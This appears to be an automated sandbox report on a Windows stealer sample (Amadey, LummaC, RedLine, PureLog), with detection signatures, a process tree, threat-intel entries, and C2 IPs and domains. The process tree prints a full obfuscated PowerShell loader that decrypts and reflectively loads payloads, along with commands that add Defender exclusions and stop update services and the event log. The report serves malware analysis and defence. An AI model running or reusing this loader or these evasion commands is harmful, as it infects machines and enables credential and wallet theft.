Edit tour

Windows Analysis Report
Mc3FDUMnVz.exe

Overview

General Information

Sample name:	Mc3FDUMnVz.exe
Analysis ID:	1611334
MD5:	dfe7e5e8ff97c65bc0cb46b7a2aab1fd
SHA1:	b98189cb3246b0fc21eb99e67c43ab09e417bca1
SHA256:	cd2e6080612c7e1cc99b1fae83f25867ddbd350cfd07c96001723d51554d672b
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Drops script at startup location

Sigma detected: Stop EventLog

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell decode and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates multiple autostart registry keys

Drops script or batch files to the startup folder

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious ZIP file

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64native

Mc3FDUMnVz.exe (PID: 6112 cmdline: "C:\Users\user\Desktop\Mc3FDUMnVz.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 1844 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 5084 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

powershell.exe (PID: 5080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6176 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 1252 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: F586835082F632DC8D9404D83BC16316)

WerFault.exe (PID: 6456 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4628 -ip 4628 MD5: 40A149513D721F096DDF50C04DA2F01F)

cmd.exe (PID: 1624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1740 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 6228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Ryu8yUx.exe (PID: 4628 cmdline: "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)

Ryu8yUx.exe (PID: 2412 cmdline: "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)

WerFault.exe (PID: 5372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 920 MD5: 40A149513D721F096DDF50C04DA2F01F)

UN8QxIq.exe (PID: 5208 cmdline: "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe" MD5: 0FBE0A00E11B8418F870546943C5E478)

powershell.exe (PID: 4444 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5232 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wusa.exe (PID: 7760 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)

sc.exe (PID: 4812 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7920 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 4240 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 5456 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 5404 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powercfg.exe (PID: 7244 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powercfg.exe (PID: 5080 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powercfg.exe (PID: 832 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powercfg.exe (PID: 5756 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

dialer.exe (PID: 196 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 888 cmdline: winlogon.exe MD5: A987B43E6A8E8F894B98A3DF022DB518)

lsass.exe (PID: 952 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)

svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: F586835082F632DC8D9404D83BC16316)

dwm.exe (PID: 1192 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 1312 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1364 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1380 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1440 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: F586835082F632DC8D9404D83BC16316)

IntelCpHDCPSvc.exe (PID: 1520 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe MD5: B6BAD2BD8596D9101874E9042B8E2D63)

svchost.exe (PID: 1528 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: F586835082F632DC8D9404D83BC16316)

Conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 4692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 8164 cmdline: MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 8644 cmdline: MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 8736 cmdline: MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Conhost.exe (PID: 8396 cmdline: MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 3368 cmdline: C:\Windows\system32\sc.exe delete "YUPXPWRM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7908 cmdline: C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 2664 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 448 cmdline: C:\Windows\system32\sc.exe start "YUPXPWRM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

ViGgA8C.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe" MD5: 5937CA40BD9145C27E123DAAA40B1266)

conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

covxzxzipzly.exe (PID: 2424 cmdline: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe MD5: 0FBE0A00E11B8418F870546943C5E478)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["103.214.142.152:26264"], "Bot Id": "cheat"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: LummaC

{"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\tYliuwV[1].ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000000.78919175290.00000000006A2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.78377777271.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
0000003D.00000002.79568618029.0000000005630000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.78404250496.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000002.79064100946.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
